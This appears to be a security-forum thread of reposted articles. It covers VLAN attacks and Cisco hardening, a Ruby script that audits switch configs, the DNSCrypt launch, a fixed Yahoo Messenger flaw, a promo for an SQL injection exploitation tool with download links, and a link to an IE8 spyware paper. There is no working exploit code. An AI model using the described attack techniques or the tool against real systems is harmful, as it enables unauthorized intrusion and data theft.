# no vlan access-map map_name 0-65535

To delete the VLAN access map:
# no vlan access-map map_name

VMPS/VQP Attack

This kind of attack normally happens on Dynamic VLAN Access Ports. VMPS uses the VQP protocol. The disadvantage of VMPS is that it doesn't use authentication for assigning VLANs based on the MAC address, and it also runs over UDP, which further makes it more vulnerable to attack. Normally a DoS attack happens in order to join the unauthenticated VLAN.

VLAN Hopping Attack

VLAN hopping works by sending packets to a port which should not be accessible. Basically, there are two types of VLAN hopping attack:
Switch Spoofing
Double Tagging

Switch Spoofing

Switch spoofing happens when a malicious user tries to configure a system to spoof itself as a switch by matching itself to 802.1q or ISL. The malicious user is able to spoof the switch with the help of Dynamic Trunk Protocol (DTP) signaling.

Double Tagging

Double tagging is a method that involves tagging transmitted frames with two 802.1q headers; one of the headers is used for the victim's switch and the other is used for the attacker's switch.

The simplest way to prevent a VLAN hopping attack is by disabling Dynamic Trunk Protocol (DTP) on all untrusted ports. For example:
ciscoswitch# conf t
ciscoswitch(config)# int gi1/10
ciscoswitch(config-if)# switchport nonegotiate

In the example, "switchport nonegotiate" disables DTP.

Double-Encapsulated 802.1Q

IEEE 802.1Q helps to create smaller networks out of large networks. A large network is very slow and consumes a lot of bandwidth, whereas a smaller network is easier to manage and consumes less bandwidth. So, it's desirable to have a smaller network rather than a large complex network. IEEE 802.1Q was developed as a part of IEEE 802. To use IEEE 802.1Q, it's a must that we implement a trunk. Suppose a trunk is enabled in IEEE 802.1Q; a certain type of attack is performed on 802.1Q. This attack is called the double encapsulation attack. It adds two tags to the original frame. An IEEE 802.1Q trunk always modifies the frame by eliminating the outer tag, but the inner tag remains permanently and it becomes the destination. To prevent double encapsulation in 802.1Q, the native VLAN should not be assigned to any port. We must force traffic on the trunk to always carry a tag. To make the trunk carry a tag, we can use the command "Switch(config)# vlan dot1q tag native". It is a global command to tag the native VLAN.

Random Frame Stress Attack

A random frame stress attack has many types, but it's generally a brute force attack performed on several fields. In this type of brute force attack the source address and destination address are kept constant. They are primarily performed to test the switch's ability when it encounters abnormalities in inputs and calculations. A random frame stress attack can be prevented when a Private VLAN or PVLAN is used to separate the host from receiving those unwanted inputs.

Using Shodan for gathering information

This is just to find out the online devices using Shodan (http://www.shodanhq.com). Shodan stands for Sentient Hyper-Optimized Data Access Network, which is almost similar to a normal search engine except for its results. Shodan grabs the banner of the devices and gives detailed information, thus helping the user while pen testing. The usage of Shodan is simple and easy, and it also has a Shodan syntax for making the results more filtered. For example, to find a device or service running on the target, the syntax would be "service name" hostname:target.com. Similarly we can discover more devices, making the analysis of the target easier and also reducing the time. Another example would be finding L2 devices, for example a Netgear GSM7212 L2 switch from a particular country. The image shows the Netgear switch from the country US. Similarly, we can find different devices for the information gathering phase.

Conclusion

I hope this helps understand various VLAN attacks and makes the concept simpler. On the other hand, attacking a VLAN is tough. And never forget to change the default settings of your devices. A few points for the administrators would be:
Manage switches in as secure a manner
The native VLAN ID should not be used for trunking. Always use a dedicated VLAN ID for all trunk ports.
Set all user ports to non-trunking.
Do configure the port-security feature in the switch for more protection. (Note: be careful about configuring the port-security feature.)
Avoid using VLAN 1.
Deploy port-security where possible for user ports.
Enable BPDU Guard for STP attack mitigation.
Use private VLANs where appropriate to further divide L2 networks.
If VTP is used, use MD5 authentication.
Unused ports can be disabled.

Sursa: http://resources.infosecinstitute.com/vlan-hacking/
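Added here as an example, not part of the article: a small Ruby audit that reads a Cisco IOS-style running-config excerpt and reports which of the article's recommendations it does not meet (DAI enabled, native VLAN tagged, DTP disabled and a dedicated native VLAN on trunks, access mode plus port-security and BPDU guard on user ports, VLAN 1 unused, unused ports shut down). The config text, interface names and VLAN numbers are constructed for illustration.

```ruby
# Constructed running-config excerpt (placeholder interfaces and VLAN numbers).
SAMPLE_CONFIG = <<~CFG
  ip arp inspection vlan 10,20
  !
  interface GigabitEthernet1/1
   description uplink to core
   switchport mode trunk
   switchport trunk native vlan 999
   switchport nonegotiate
  !
  interface GigabitEthernet1/2
   description user port
   switchport mode access
   switchport access vlan 10
   switchport port-security
   spanning-tree bpduguard enable
  !
  interface GigabitEthernet1/3
   description lab port, left at factory defaults
   switchport access vlan 1
  !
  interface GigabitEthernet1/4
   shutdown
  !
CFG

# Split the config into the global command list and one command list per interface.
def parse_config(text)
  globals = []
  interfaces = {}
  current = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line == '!'
    if line.start_with?('interface ')
      current = line.sub('interface ', '')
      interfaces[current] = []
    elsif current
      interfaces[current] << line
    else
      globals << line
    end
  end
  [globals, interfaces]
end

# Return {'global' or interface name => [findings]}; interfaces with no
# findings are omitted, so an empty hash means every check passed.
def audit_vlan_config(text)
  globals, interfaces = parse_config(text)
  findings = Hash.new { |h, k| h[k] = [] }

  unless globals.any? { |l| l.start_with?('ip arp inspection vlan') }
    findings['global'] << 'Dynamic ARP Inspection is not enabled on any VLAN'
  end
  unless globals.include?('vlan dot1q tag native')
    findings['global'] << 'native VLAN frames go untagged (no "vlan dot1q tag native")'
  end

  interfaces.each do |name, cmds|
    next if cmds.include?('shutdown') # disabled port: nothing else to check
    if cmds.include?('switchport mode trunk')
      findings[name] << 'trunk still negotiates DTP (no "switchport nonegotiate")' unless cmds.include?('switchport nonegotiate')
      native = cmds.find { |c| c.start_with?('switchport trunk native vlan ') }
      findings[name] << 'trunk uses the default native VLAN 1' if native.nil? || native.split.last == '1'
    else
      findings[name] << 'not forced to access mode, DTP could negotiate a trunk' unless cmds.include?('switchport mode access')
      findings[name] << 'user port sits in VLAN 1' if cmds.include?('switchport access vlan 1') || cmds.none? { |c| c.start_with?('switchport access vlan ') }
      findings[name] << 'port-security not configured' unless cmds.include?('switchport port-security')
      findings[name] << 'BPDU guard not enabled' unless cmds.include?('spanning-tree bpduguard enable')
    end
  end
  findings.reject { |_, issues| issues.empty? }
end

if __FILE__ == $PROGRAM_NAME
  audit_vlan_config(SAMPLE_CONFIG).each do |where, issues|
    issues.each { |issue| puts "#{where}: #{issue}" }
  end
end
```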
-
[h=1]Introducing DNSCrypt (Preview Release)[/h]
[h=2]Securing a critical piece of Internet infrastructure[/h]

Background: The need for better DNS security

DNS is one of the fundamental building blocks of the Internet. It's used any time you visit a website, send an email, have an IM conversation or do anything else online. While OpenDNS has provided world-class security using DNS for years, and OpenDNS is the most secure DNS service available, the underlying DNS protocol has not been secure enough for our comfort. Many will remember the Kaminsky Vulnerability, which impacted nearly every DNS implementation in the world (though not OpenDNS). That said, the class of problems that the Kaminsky Vulnerability related to were a result of some of the underlying foundations of the DNS protocol that are inherently weak -- particularly in the "last mile." The "last mile" is the portion of your Internet connection between your computer and your ISP. DNSCrypt is our way of securing the "last mile" of DNS traffic and resolving (no pun intended) an entire class of serious security concerns with the DNS protocol. There have been numerous examples of tampering, or man-in-the-middle attacks, and snooping of DNS traffic at the last mile, and it represents a serious security risk that we've always wanted to fix. Today we can.

Why DNSCrypt is so significant

In the same way that SSL turns HTTP web traffic into HTTPS encrypted Web traffic, DNSCrypt turns regular DNS traffic into encrypted DNS traffic that is secure from eavesdropping and man-in-the-middle attacks. It doesn't require any changes to domain names or how they work; it simply provides a method for securely encrypting communication between our customers and our DNS servers in our data centers. We know that claims alone don't work in the security world, however, so we've opened up the source to our DNSCrypt code base and it's available on GitHub. DNSCrypt has the potential to be the most impactful advancement in Internet security since SSL, significantly improving every single Internet user's online security and privacy.

Download DNSCrypt! (Mac only at the moment)

Frequently Asked Questions (FAQ):

1. In plain English, what is DNSCrypt?
DNSCrypt is a piece of lightweight software that everyone should use to boost online privacy and security. It works by encrypting all DNS traffic between the user and OpenDNS, preventing any spying, spoofing or man-in-the-middle attacks.

2. How can I use DNSCrypt today?
DNSCrypt is immediately available as a technology preview. It should work and shouldn't cause problems, but we're still making iterative changes regularly. You can download it at the link above. Initially it's available for Mac, though we expect a PC version in the near future.

Tips:
The service is not configured to maintain state between reboots; it defaults to off when you reboot. This is only for early releases. Eventually we will have it maintain your preferences between reboots.
If you have a firewall or other middleware mangling your packets, you should try enabling DNSCrypt with TCP over port 443. This will make most firewalls think it's HTTPS traffic and leave it alone.
If you prefer reliability over security, enable fallback to insecure DNS. If you can't reach us, we'll try using your DHCP-assigned or previously configured DNS servers. This is a security risk though.

3. What about DNSSEC? Does this eliminate the need for DNSSEC?
No. DNSCrypt and DNSSEC are complementary. DNSSEC does a number of things. First, it provides authentication. (Is the DNS record I'm getting a response for coming from the owner of the domain name I'm asking about, or has it been tampered with?) Second, DNSSEC provides a chain of trust to help establish confidence that the answers you're getting are verifiable. But unfortunately, DNSSEC doesn't actually provide encryption for DNS records, even those signed by DNSSEC. Even if everyone in the world used DNSSEC, the need to encrypt all DNS traffic would not go away. Moreover, DNSSEC today represents a near-zero percentage of overall domain names and an increasingly smaller percentage of DNS records each day as the Internet grows. That said, DNSSEC and DNSCrypt can work perfectly together. They aren't conflicting in any way. Think of DNSCrypt as a wrapper around all DNS traffic and DNSSEC as a way of signing and providing validation for a subset of those records. There are benefits to DNSSEC that DNSCrypt isn't trying to address; in fact, we hope DNSSEC adoption grows so that people can have more confidence in the entire DNS infrastructure, not just the link between our customers and OpenDNS.

4. Is this using SSL? What's the crypto and what's the design?
We are not using SSL. While we make the analogy that DNSCrypt is like SSL in that it wraps all DNS traffic with encryption the same way SSL wraps all HTTP traffic, it's not the crypto library being used. We're using elliptic-curve cryptography, in particular the Curve25519 elliptic curve. The design goals are similar to those described in the DNSCurve forwarder design.

Sursa: http://www.opendns.com/technology/dnscrypt/
-
[h=1]Yahoo Closes Zero-Day YIM Hole[/h]
07 December 2011

Users in control of their status message again

Earlier today we got an update from Yahoo that the issue we reported in a previous blog post has been fixed. As of the moment, YIM users running version 11.x of the instant messaging client are not vulnerable to the status-change mechanism anymore. If you are running a vulnerable version of the product (all releases in version 11, including the latest version of the kit), you should know that you don't have to download and install anything, as the fix has been applied server-side.

Bitdefender discovered the flaw last Friday as part of a forensic investigation on a customer's machine. We immediately notified the affected vendor and other antivirus companies about the new threat and provided proof of concept code as basis for issuing a fix.

Sursa: Yahoo Closes Zero-Day YIM Hole - MalwareCity : Computer Security Blog
-
NTO SQL Invader

NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.

Easy to use - The tool's GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straight from an application scan report. You can then control how much information is harvested.

Clearly presents evidence - Unlike tools that provide all data via command line, NTO SQL Invader provides the data in an organized manner that is useful for both executive meetings as well as technical analysis and remediation.

Enables easy transport of logging data - All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC.

Video demo: http://www.ntobjectives.com/research/sqlinvader-intro
Download: http://go.ntobjectives.com/e/8672/-18735-NTOSQLInvader-Setup-exe/EEOX/47243855
Mirror: http://www.multiupload.com/33KTSNSWI0

Sursa: http://go.ntobjectives.com/l/8672/2011-12-01/DRMN
-
[h=1]Spying Internet Explorer 8.0[/h]
28 September 2011
Author: Brian Mariani, Senior Security Auditor at High-Tech Bridge SA

Malicious software, also known as "Malcode" or "Malware", can compromise the security and functionality of a program. Once "installed" it monitors the user's habits. This document introduces this kind of threat by spying on a widespread internet browser.

PDF: Spying Internet Explorer 8.0 (1,5 MB)
Project files (SpyingIE.zip) (150 kB)

Sursa: https://www.htbridge.ch/publications/spying_internet_explorer_8_0.html

It can be done more easily, but this way it's more "1337".
-
Do the words of these clowns matter? No serious person gives two cents for them.
-
And here I was thinking it was "Offensive Security Certified Expert"... http://www.offensive-security.com/information-security-certifications/
-
I'll just clap my hands and it'll be fixed right away. I take care of RST in my free time and, as you can see, I haven't had much free time in the last few days. If I don't have time today or tomorrow evening, I'll fix it over the weekend; I have several things to fix, and the problem is that it's not a matter of two clicks and, poof, it's done.